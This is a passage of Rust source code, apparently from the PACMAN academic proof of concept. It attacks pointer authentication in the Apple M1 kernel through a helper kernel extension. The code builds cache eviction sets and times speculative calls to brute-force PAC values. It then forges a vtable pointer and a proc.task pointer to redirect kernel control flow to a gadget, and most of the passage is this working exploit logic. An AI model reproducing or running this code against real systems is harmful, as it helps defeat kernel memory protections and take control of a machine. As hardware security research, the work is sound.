limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 766 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 767 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), LIMIT_EVSET_SIZE).into_iter().cloned().collect(); 768 | let mut limit_indexes : Vec = (0..limit_evset_chosen.len()).collect(); 769 | 770 | // Setup evset for the vtable (success data pointer) 771 | let new_vtable_va = new_vtable; 772 | let new_vtable_pa = handle.kernel_virt_to_phys(new_vtable_va).unwrap(); 773 | let new_vtable_evset = evset::data_pevset(new_vtable_va, new_vtable_pa, memory_region); 774 | let mut new_vtable_evset_chosen : Vec = new_vtable_evset.choose_multiple(&mut rand::thread_rng(), DATA_EVSET_SIZE).into_iter().cloned().collect(); 775 | let mut new_vtable_indexes : Vec = (0..new_vtable_evset_chosen.len()).collect(); 776 | 777 | let try_speculative = || { 778 | victim_handle.call_service_routine(10000, 0, 0, 0, 0, 0); 779 | }; 780 | 781 | let try_nonspeculative = || { 782 | victim_handle.call_service_routine(0, 0, 0, 0, 0, 0); 783 | }; 784 | 785 | let target = PacmanAttackTarget::Direct( 786 | DirectTarget{ 787 | holder: victim_object, 788 | train_ptr: original_signed_vtable_ptr, 789 | guess_ptr: new_vtable | PAC_BITMASK, 790 | } 791 | ); 792 | 793 | if !do_bruteforce { 794 | // Generate an incorrect PAC to compare against 795 | let incorrect_pac = correct_pac ^ (crandom::rand() as u16 % pac::MAX_PAC); 796 | let incorrect_signed_new_vtable_ptr = pac::encode_pac(incorrect_pac, correct_signed_new_vtable_ptr | PAC_BITMASK); 797 | 798 | assert_ne!(correct_pac, incorrect_pac); 799 | assert_ne!(correct_signed_new_vtable_ptr, incorrect_signed_new_vtable_ptr); 800 | 801 | // Try just one correct and one incorrect, see if we can tell them apart: 802 | println!("Forging vtable pointer in PacmanKitService"); 803 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", original_signed_vtable_ptr, pac::extract_pac(original_signed_vtable_ptr)); 804 | println!("\tCorrect new pointer: 0x{:X} (pac is 0x{:X})", correct_signed_new_vtable_ptr, pac::extract_pac(correct_signed_new_vtable_ptr)); 805 | println!("\tIncorrect new pointer: 0x{:X} (pac is 0x{:X})", incorrect_signed_new_vtable_ptr, pac::extract_pac(incorrect_signed_new_vtable_ptr)); 806 | pacman_differentiate::<_, _, DATA_NUM_TRIALS, DATA_NUM_ITERS, DATA_EVSET_SIZE, DATA_MISS_LATENCY>( 807 | &handle, 808 | target, 809 | correct_signed_new_vtable_ptr, 810 | incorrect_signed_new_vtable_ptr, 811 | timer::time_access, 812 | try_speculative, 813 | try_nonspeculative, 814 | &new_vtable_evset_chosen, 815 | &mut new_vtable_indexes, 816 | &limit_evset_chosen, 817 | &mut limit_indexes 818 | ); 819 | } 820 | else { 821 | println!("Brute-forcing vtable pointer in PacmanKitService"); 822 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", original_signed_vtable_ptr, pac::extract_pac(original_signed_vtable_ptr)); 823 | println!("\tWant to find: 0x{:X} (pac is 0x{:X})", correct_signed_new_vtable_ptr, pac::extract_pac(correct_signed_new_vtable_ptr)); 824 | pacman_bruteforce::<_, _, DATA_NUM_TRIALS, DATA_NUM_ITERS, DATA_NUM_FINAL_ITERS, DATA_EVSET_SIZE, DATA_MISS_LATENCY>( 825 | &handle, 826 | target, 827 | timer::time_access, 828 | try_speculative, 829 | try_nonspeculative, 830 | &new_vtable_evset_chosen, 831 | &mut new_vtable_indexes, 832 | &limit_evset_chosen, 833 | &mut limit_indexes 834 | ); 835 | } 836 | } 837 | 838 | /** 839 | * Instruction version of the PACMAN attack. 840 | */ 841 | pub unsafe fn inst_testing(memory_region: &mut [u8], do_bruteforce: bool) { 842 | // Handle is used for interfacing with PacmanKit 843 | let handle = PacmanKitConnection::init().unwrap(); 844 | 845 | // Victim handle gives us a victim IOUserClient to exploit 846 | let victim_handle = PacmanKitConnection::init().unwrap(); 847 | 848 | // Locate target object 849 | let (victim_user_client, victim_object, victim_vtable_original, victim_vtable_entry) = find_victim_objects(&victim_handle); 850 | 851 | // Setup fake vtable with data PAC oracle (later we will use PACMAN for this too) 852 | // We are trying to guess the correct value INSIDE the vtable (not the vtable ptr itself) so it's ok to "cheat" here 853 | // as long as we use the data PACMAN attack to find this value in the real attack. 854 | // So the data attack needs to produce exactly one value (new_vtable_signed). 855 | let new_vtable = (handle.kernel_mmap().unwrap() | PAC_BITMASK) + 0x24c940; 856 | let new_vtable_salt = get_salt(victim_object | PAC_BITMASK, 0xd986); 857 | let new_vtable_signed = handle.forge_sign_data(new_vtable, new_vtable_salt).unwrap(); 858 | 859 | // Locate win() somewhere in the kernel retpoline (now a NOP sled!) 860 | let win = handle.leak_retpoline().unwrap() | PAC_BITMASK + 0x30c0; 861 | 862 | // This is the salt to use for any pointers put into the forged vtable: 863 | let salt_inst = get_salt(new_vtable | PAC_BITMASK, 0xa7d5); 864 | 865 | // Correct PAC we want to find: 866 | let correct_signed_new_vtable_entry = handle.forge_sign_inst(win | PAC_BITMASK, salt_inst).unwrap(); 867 | let correct_pac = pac::extract_pac(correct_signed_new_vtable_entry); 868 | 869 | // Setup evset for LIMIT 870 | let limit_va = handle.leak_limit_location().unwrap(); 871 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 872 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 873 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), LIMIT_EVSET_SIZE).into_iter().cloned().collect(); 874 | let mut limit_indexes : Vec = (0..limit_evset_chosen.len()).collect(); 875 | 876 | // Setup evset for win() (success inst pointer) 877 | let win_va = win; 878 | let win_pa = handle.kernel_virt_to_phys(win_va).unwrap(); 879 | let win_evset = evset::inst_pevset(win_va, win_pa, memory_region); 880 | let mut win_evset_chosen : Vec = win_evset.choose_multiple(&mut rand::thread_rng(), INST_EVSET_SIZE).into_iter().cloned().collect(); 881 | let mut win_indexes : Vec = (0..win_evset_chosen.len()).collect(); 882 | 883 | limit_evset_chosen.sort(); 884 | win_evset_chosen.sort(); 885 | 886 | let mut results = [[0; INST_NUM_ITERS]; INST_NUM_TRIALS]; 887 | 888 | // Use a giant retpoline to flush the L1 iCache 889 | let mut retpoline_l1i_as_ptr : *mut u8 = 0 as *mut u8; 890 | let kret = mach::mach_vm_allocate( 891 | mach::mach_task_self(), 892 | &mut retpoline_l1i_as_ptr, 893 | cache::L2_SIZE, 894 | VM_FLAGS_ANYWHERE 895 | ); 896 | 897 | let err_str = CStr::from_ptr(mach_error_string(kret)); 898 | if KERN_SUCCESS != kret { 899 | println!("Error creating L1 iCache retpoline memory region! ({}). Error is {:?}", kret, err_str); 900 | return; 901 | } 902 | 903 | // For flush_iCache: 904 | let retpoline_l1i = (retpoline_l1i_as_ptr as u64) & (!PAC_BITMASK); 905 | retpoline::mk_retpoline_addr(retpoline_l1i as u64, cache::L2_SIZE); 906 | 907 | let try_speculative = || { 908 | victim_handle.call_service_routine(10000, 0, 0, 0, 0, 0); 909 | }; 910 | 911 | let try_nonspeculative = || { 912 | victim_handle.call_service_routine(0, 0, 0, 0, 0, 0); 913 | }; 914 | 915 | // Forge non-speculatively (for testing): 916 | // handle.kernel_write(victim_vtable, correct_signed_new_vtable_entry); 917 | // try_nonspeculative(); 918 | // loop{} 919 | 920 | let target = PacmanAttackTarget::Indirect( 921 | IndirectTarget{ 922 | outer_holder: victim_object, 923 | inner_holder: new_vtable, 924 | outer_train_ptr: victim_vtable_original, 925 | outer_guess_ptr: new_vtable_signed, 926 | 927 | // This is ignored by differentiate (in favor of the correct/ incorrect ptr args), 928 | // and is the pointer to forge for bruteforce 929 | inner_guess_ptr: win | PAC_BITMASK, 930 | } 931 | ); 932 | 933 | if !do_bruteforce { 934 | let incorrect_pac = correct_pac ^ (crandom::rand() as u16 % pac::MAX_PAC); 935 | let incorrect_signed_new_vtable_entry = pac::encode_pac(incorrect_pac, win | PAC_BITMASK); 936 | 937 | assert_ne!(correct_pac, incorrect_pac); 938 | assert_ne!(correct_signed_new_vtable_entry, incorrect_signed_new_vtable_entry); 939 | // Try just one correct and one incorrect, see if we can tell them apart: 940 | println!("Forging vtable entry (PacmanKitService::externalMethod) in PacmanKitService`vtable"); 941 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", victim_vtable_entry, pac::extract_pac(victim_vtable_entry)); 942 | println!("\tIncorrect new pointer: 0x{:X} (pac is 0x{:X})", incorrect_signed_new_vtable_entry, pac::extract_pac(incorrect_signed_new_vtable_entry)); 943 | println!("\tCorrect new pointer: 0x{:X} (pac is 0x{:X})", correct_signed_new_vtable_entry, pac::extract_pac(correct_signed_new_vtable_entry)); 944 | pacman_differentiate::<_, _, INST_NUM_TRIALS, INST_NUM_ITERS, INST_EVSET_SIZE, INST_MISS_LATENCY>( 945 | &handle, 946 | target, 947 | // Inner holder correct/ incorrect: 948 | correct_signed_new_vtable_entry, 949 | incorrect_signed_new_vtable_entry, 950 | timer::time_exec, 951 | try_speculative, 952 | try_nonspeculative, 953 | &win_evset_chosen, 954 | &mut win_indexes, 955 | &limit_evset_chosen, 956 | &mut limit_indexes 957 | ); 958 | } 959 | else { 960 | println!("Brute-forcing vtable entry (PacmanKitService::externalMethod) in PacmanKitService`vtable"); 961 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", victim_vtable_entry, pac::extract_pac(victim_vtable_entry)); 962 | println!("\tWant to find: 0x{:X} (pac is 0x{:X})", correct_signed_new_vtable_entry, pac::extract_pac(correct_signed_new_vtable_entry)); 963 | pacman_bruteforce::<_, _, INST_NUM_TRIALS, INST_NUM_ITERS, INST_NUM_FINAL_ITERS, INST_EVSET_SIZE, INST_MISS_LATENCY>( 964 | &handle, 965 | target, 966 | timer::time_exec, 967 | try_speculative, 968 | try_nonspeculative, 969 | &win_evset_chosen, 970 | &mut win_indexes, 971 | &limit_evset_chosen, 972 | &mut limit_indexes 973 | ); 974 | } 975 | } 976 | 977 | pub unsafe fn end_to_end(memory_region: &mut [u8]) { 978 | // Handle is used for interfacing with PacmanKit 979 | let handle = PacmanKitConnection::init().unwrap(); 980 | 981 | // Victim handle gives us a victim IOUserClient to exploit 982 | let victim_handle = PacmanKitConnection::init().unwrap(); 983 | 984 | // Locate target object 985 | let (victim_user_client, victim_object, victim_vtable, victim_vtable_entry) = find_victim_objects(&victim_handle); 986 | 987 | // Data attack will find new_vtable_signed 988 | let new_vtable = (handle.kernel_mmap().unwrap() | PAC_BITMASK) + 0x24c940; 989 | 990 | // Inst attack will find win_signed 991 | let win = handle.leak_retpoline().unwrap() | PAC_BITMASK + 0x30c0; 992 | 993 | // Setup evset for LIMIT 994 | let limit_va = handle.leak_limit_location().unwrap(); 995 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 996 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 997 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), LIMIT_EVSET_SIZE).into_iter().cloned().collect(); 998 | let mut limit_indexes : Vec = (0..limit_evset_chosen.len()).collect(); 999 | 1000 | // Setup evset for the vtable (success data pointer) 1001 | let new_vtable_va = new_vtable; 1002 | let new_vtable_pa = handle.kernel_virt_to_phys(new_vtable_va).unwrap(); 1003 | let new_vtable_evset = evset::data_pevset(new_vtable_va, new_vtable_pa, memory_region); 1004 | let mut new_vtable_evset_chosen : Vec = new_vtable_evset.choose_multiple(&mut rand::thread_rng(), DATA_EVSET_SIZE).into_iter().cloned().collect(); 1005 | let mut new_vtable_indexes : Vec = (0..new_vtable_evset_chosen.len()).collect(); 1006 | 1007 | // Setup evset for win() (success inst pointer) 1008 | let win_va = win; 1009 | let win_pa = handle.kernel_virt_to_phys(win_va).unwrap(); 1010 | let win_evset = evset::inst_pevset(win_va, win_pa, memory_region); 1011 | let mut win_evset_chosen : Vec = win_evset.choose_multiple(&mut rand::thread_rng(), INST_EVSET_SIZE).into_iter().cloned().collect(); 1012 | let mut win_indexes : Vec = (0..win_evset_chosen.len()).collect(); 1013 | 1014 | // Closures for both attacks 1015 | let try_speculative = || { 1016 | victim_handle.call_service_routine(10000, 0, 0, 0, 0, 0); 1017 | }; 1018 | 1019 | let try_nonspeculative = || { 1020 | victim_handle.call_service_routine(0, 0, 0, 0, 0, 0); 1021 | }; 1022 | 1023 | // 1. DATA ATTACK -> Finds new_vtable_signed 1024 | 1025 | // Print the correct answer to the screen- note that we can never rely on DATA_ORACLE (we must generate the value ourselves!) 1026 | let salt_data = get_salt(victim_object | PAC_BITMASK, 0xd986); 1027 | let DATA_ORACLE = handle.forge_sign_data(new_vtable | PAC_BITMASK, salt_data).unwrap(); 1028 | println!("Brute-forcing vtable pointer in PacmanKitService"); 1029 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", victim_vtable, pac::extract_pac(victim_vtable)); 1030 | println!("\tWant to find: 0x{:X} (pac is 0x{:X})", DATA_ORACLE, pac::extract_pac(DATA_ORACLE)); 1031 | 1032 | let data_target = PacmanAttackTarget::Direct( 1033 | DirectTarget{ 1034 | holder: victim_object, 1035 | train_ptr: victim_vtable, 1036 | guess_ptr: new_vtable | PAC_BITMASK, 1037 | } 1038 | ); 1039 | 1040 | let new_vtable_signed = match pacman_bruteforce::<_, _, DATA_NUM_TRIALS, DATA_NUM_ITERS, DATA_NUM_FINAL_ITERS, DATA_EVSET_SIZE, DATA_MISS_LATENCY>( 1041 | &handle, 1042 | data_target, 1043 | timer::time_access, 1044 | &try_speculative, 1045 | &try_nonspeculative, 1046 | &new_vtable_evset_chosen, 1047 | &mut new_vtable_indexes, 1048 | &limit_evset_chosen, 1049 | &mut limit_indexes 1050 | ) { 1051 | Some(x) => x, 1052 | None => { panic!("Couldn't find the data solution!"); } 1053 | }; 1054 | 1055 | if new_vtable_signed != DATA_ORACLE { 1056 | panic!("Aborting early to prevent your kernel from panicking- the data pointer was INCORRECT!"); 1057 | } 1058 | 1059 | // 2. INST ATTACK -> Finds win_signed for new_vtable 1060 | 1061 | // Print the correct answer to the screen- note that we can never rely on INST_ORACLE (we must generate the value ourselves!) 1062 | let salt_inst = get_salt(new_vtable | PAC_BITMASK, 0xa7d5); 1063 | let INST_ORACLE = handle.forge_sign_inst(win | PAC_BITMASK, salt_inst).unwrap(); 1064 | 1065 | println!("Brute-forcing vtable entry (PacmanKitService::externalMethod) in PacmanKitService`vtable"); 1066 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", victim_vtable_entry, pac::extract_pac(victim_vtable_entry)); 1067 | println!("\tWant to find: 0x{:X} (pac is 0x{:X})", INST_ORACLE, pac::extract_pac(INST_ORACLE)); 1068 | 1069 | let inst_target = PacmanAttackTarget::Indirect( 1070 | IndirectTarget{ 1071 | outer_holder: victim_object, 1072 | inner_holder: new_vtable, 1073 | outer_train_ptr: victim_vtable, 1074 | 1075 | // Found by data attack: 1076 | outer_guess_ptr: new_vtable_signed, 1077 | 1078 | // Want to find the correct signature for win(): 1079 | inner_guess_ptr: win | PAC_BITMASK, 1080 | } 1081 | ); 1082 | 1083 | let win_signed = match pacman_bruteforce::<_, _, INST_NUM_TRIALS, INST_NUM_ITERS, INST_NUM_FINAL_ITERS, INST_EVSET_SIZE, INST_MISS_LATENCY>( 1084 | &handle, 1085 | inst_target, 1086 | timer::time_exec, 1087 | &try_speculative, 1088 | &try_nonspeculative, 1089 | &win_evset_chosen, 1090 | &mut win_indexes, 1091 | &limit_evset_chosen, 1092 | &mut limit_indexes 1093 | ) { 1094 | Some(x) => x, 1095 | None => { panic!("Couldn't find the inst solution!"); } 1096 | }; 1097 | 1098 | if win_signed != INST_ORACLE { 1099 | panic!("Aborting early to prevent your kernel from panicking- the inst pointer was INCORRECT!"); 1100 | } 1101 | 1102 | println!("Bruteforced all the way!"); 1103 | 1104 | // Give it a use: 1105 | handle.kernel_write(new_vtable, win_signed); 1106 | handle.kernel_write(victim_object, new_vtable_signed); 1107 | try_nonspeculative(); 1108 | } 1109 | 1110 | pub const SYS_MEMORYSTATUS_AVAILABLE_MEMORY : u64 = 534; 1111 | 1112 | pub static mut PRESSURE_THREAD_STARTED : bool = false; 1113 | 1114 | pub static mut PRESSURE_EVSET : Vec = Vec::new(); 1115 | 1116 | pub unsafe fn memorystatus_available_memory() -> u64 { 1117 | let retval : u64; 1118 | asm!{ 1119 | "svc #0", 1120 | in("x8") SYS_MEMORYSTATUS_AVAILABLE_MEMORY, 1121 | in("x16") SYS_MEMORYSTATUS_AVAILABLE_MEMORY, 1122 | lateout("x0") retval, 1123 | } 1124 | return retval; 1125 | } 1126 | 1127 | /// Attack memorystatus_available_memory system call to forge proc.task 1128 | pub unsafe fn pacman_real(memory_region: &mut [u8]) { 1129 | const NUM_ITERS : usize = 8; 1130 | const NUM_TRIALS : usize = 12; 1131 | const MISS_LATENCY : u64 = 62; 1132 | const EVSET_SIZE : usize = 12; 1133 | 1134 | let handle = PacmanKitConnection::init().unwrap(); 1135 | let proc = handle.current_proc().unwrap() | PAC_BITMASK; 1136 | let holder = proc + 0x10; 1137 | let proc_task_original_signed = handle.kernel_read(holder).unwrap(); 1138 | let proc_task_original = handle.kernel_read(holder).unwrap() | PAC_BITMASK; 1139 | 1140 | let proc_task_new = (handle.kernel_mmap().unwrap() | PAC_BITMASK) + 0x4000; 1141 | handle.kernel_read(proc_task_new).unwrap(); 1142 | 1143 | let salt_data = get_salt(holder, 0xa08a); 1144 | let proc_task_new_correct = handle.forge_sign_data(proc_task_new, salt_data).unwrap(); 1145 | 1146 | let correct_pac = pac::extract_pac(proc_task_new_correct); 1147 | let incorrect_pac = correct_pac ^ (crandom::rand() as u16 % pac::MAX_PAC); 1148 | let proc_task_new_incorrect = pac::encode_pac(incorrect_pac, proc_task_new_correct | PAC_BITMASK); 1149 | 1150 | assert_ne!(correct_pac, incorrect_pac); 1151 | assert_ne!(proc_task_new_correct, proc_task_new_incorrect); 1152 | 1153 | // Setup evset for LIMIT (UNUSED HERE) 1154 | let limit_va = proc + 0x560; 1155 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 1156 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 1157 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), LIMIT_EVSET_SIZE).into_iter().cloned().collect(); 1158 | let mut limit_evset_indexes : Vec = (0..limit_evset_chosen.len()).collect(); 1159 | 1160 | PRESSURE_EVSET = limit_evset_chosen.clone(); 1161 | 1162 | // Setup evset for the vtable (success data pointer) 1163 | let new_vtable_va = (proc_task_new_correct + 0x338) | PAC_BITMASK; // +0x338 1164 | let new_vtable_pa = handle.kernel_virt_to_phys(new_vtable_va).unwrap(); 1165 | let new_vtable_evset = evset::data_pevset(new_vtable_va, new_vtable_pa, memory_region); 1166 | let mut evset_chosen : Vec = new_vtable_evset.choose_multiple(&mut rand::thread_rng(), EVSET_SIZE).into_iter().cloned().collect(); 1167 | let mut evset_indexes : Vec = (0..evset_chosen.len()).collect(); 1168 | 1169 | println!("{:X?}", evset_chosen); 1170 | // loop{} 1171 | 1172 | println!("Differentiating proc.task"); 1173 | println!("\tproc is at 0x{:X}", proc); 1174 | println!("\tproc.task: 0x{:X}", proc_task_original); 1175 | println!("\tCorrect new pointer: 0x{:X}", proc_task_new_correct); 1176 | println!("\tIncorrect new pointer: 0x{:X}", proc_task_new_incorrect); 1177 | 1178 | let target = PacmanAttackTarget::Direct( 1179 | DirectTarget{ 1180 | holder: holder, 1181 | train_ptr: proc_task_original_signed, 1182 | guess_ptr: proc_task_new | PAC_BITMASK, 1183 | } 1184 | ); 1185 | 1186 | let try_speculative = || { 1187 | handle.kernel_write(proc + 0x560, 0).unwrap(); 1188 | memorystatus_available_memory(); 1189 | }; 1190 | 1191 | let try_nonspeculative = || { 1192 | handle.kernel_write(proc + 0x560, 1).unwrap(); 1193 | memorystatus_available_memory(); 1194 | }; 1195 | 1196 | // DO IT ALL INLINE: 1197 | let correct_ptr = proc_task_new_correct; 1198 | let incorrect_ptr = proc_task_new_incorrect; 1199 | let known_good = proc_task_original_signed; 1200 | let time_use_fn = timer::time_access; 1201 | 1202 | let mut results = [[0; NUM_ITERS]; NUM_TRIALS]; 1203 | 1204 | let mut use_correct_pac = [false; NUM_TRIALS]; 1205 | for i in 0..NUM_TRIALS { 1206 | use_correct_pac[i] = crandom::rand() % 2 == 0; 1207 | } 1208 | 1209 | // Always ensure we get one false and one true 1210 | use_correct_pac[0] = false; 1211 | use_correct_pac[1] = true; 1212 | 1213 | // Spawn workers to put pressure on the cache 1214 | for _ in 0..4 { 1215 | thread::spawn(|| { 1216 | if !set_core(CoreKind::PCORE) { 1217 | panic!("Error setting CPU affinity!"); 1218 | } 1219 | write_volatile(&mut PRESSURE_THREAD_STARTED, true); 1220 | loop { 1221 | for i in 0..PRESSURE_EVSET.len() { 1222 | // timer::time_access(limit_evset_chosen_copy[limit_evset_indexes_copy[i]]); 1223 | // timer::time_access has ISBs in the way- we want to go as fast as possible (do as many loads as we can!) 1224 | asm!{ 1225 | "ldr {val_out}, [{addr}]", 1226 | val_out = out(reg) _, 1227 | addr = in(reg) PRESSURE_EVSET[i], 1228 | } 1229 | } 1230 | } 1231 | }); 1232 | } 1233 | 1234 | while !read_volatile(&PRESSURE_THREAD_STARTED) {} 1235 | 1236 | // thread::sleep(core::time::Duration::from_millis(1000)); 1237 | 1238 | for trial in 0..NUM_TRIALS { 1239 | let value_to_use = if use_correct_pac[trial] {correct_ptr} else {incorrect_ptr}; 1240 | let mut samples = [0; NUM_ITERS]; 1241 | 1242 | for iteration in 0..NUM_ITERS+1 { 1243 | // Run a single test case 1244 | 1245 | assert_eq!(evset_chosen.len(), EVSET_SIZE); 1246 | 1247 | // 1. Train branch predictor on known good pointer 1248 | handle.kernel_write(holder | PAC_BITMASK, known_good); 1249 | handle.kernel_write(proc + 0x560, 1).unwrap(); 1250 | for i in 0..4096 { 1251 | memorystatus_available_memory(); 1252 | } 1253 | 1254 | // 2. Write guess 1255 | handle.kernel_write(proc + 0x560, 0).unwrap(); 1256 | handle.kernel_write(holder | PAC_BITMASK, value_to_use); 1257 | 1258 | // 3. Evict LIMIT- this is ALWAYS a data access! 1259 | for i in 0..limit_evset_indexes.len() { 1260 | timer::time_access(limit_evset_chosen[limit_evset_indexes[i]]); 1261 | } 1262 | 1263 | // 4. Prime the cache 1264 | for i in 0..EVSET_SIZE { 1265 | time_use_fn(evset_chosen[evset_indexes[i]]); 1266 | } 1267 | 1268 | // 5. Try guess (speculatively) 1269 | memorystatus_available_memory(); 1270 | 1271 | // 6. Probe (go backwards with .rev() if you want to prevent self-eviction!) 1272 | let mut times = [0; EVSET_SIZE]; 1273 | for i in (0..EVSET_SIZE) { 1274 | times[i] = time_use_fn(evset_chosen[evset_indexes[i]]); 1275 | } 1276 | 1277 | // 7. Cleanup nicely 1278 | handle.kernel_write(holder | PAC_BITMASK, known_good); 1279 | handle.kernel_write(proc + 0x560, 0).unwrap(); 1280 | 1281 | // Record the number of misses 1282 | let mut misses = 0; 1283 | for i in 0..EVSET_SIZE { 1284 | if times[i] > MISS_LATENCY { 1285 | misses += 1; 1286 | } 1287 | } 1288 | 1289 | // Skip the first run 1290 | if iteration != 0 { 1291 | samples[iteration-1] = misses; 1292 | } 1293 | } 1294 | results[trial] = samples; 1295 | } 1296 | 1297 | // Post-process and print out results for graphing/ testing 1298 | for i in 0..NUM_TRIALS { 1299 | if use_correct_pac[i] { 1300 | print!("[*] "); 1301 | } 1302 | else { 1303 | print!("[x] "); 1304 | } 1305 | 1306 | results[i].sort(); 1307 | let mut avg : f64 = 0.0; 1308 | let mut total : u64 = 0; 1309 | for j in 0..results[i].len() { 1310 | avg += results[i][j] as f64; 1311 | total += results[i][j] 1312 | } 1313 | avg /= results[i].len() as f64; 1314 | let median = results[i][results[i].len() / 2]; 1315 | let max = results[i][results[i].len() - 2]; 1316 | let min = results[i][2]; 1317 | print!("{}, {}, {}, {}, {}\t", min, median, max, avg, total); 1318 | println!("{:?}", results[i]); 1319 | } 1320 | } 1321 | --------------------------------------------------------------------------------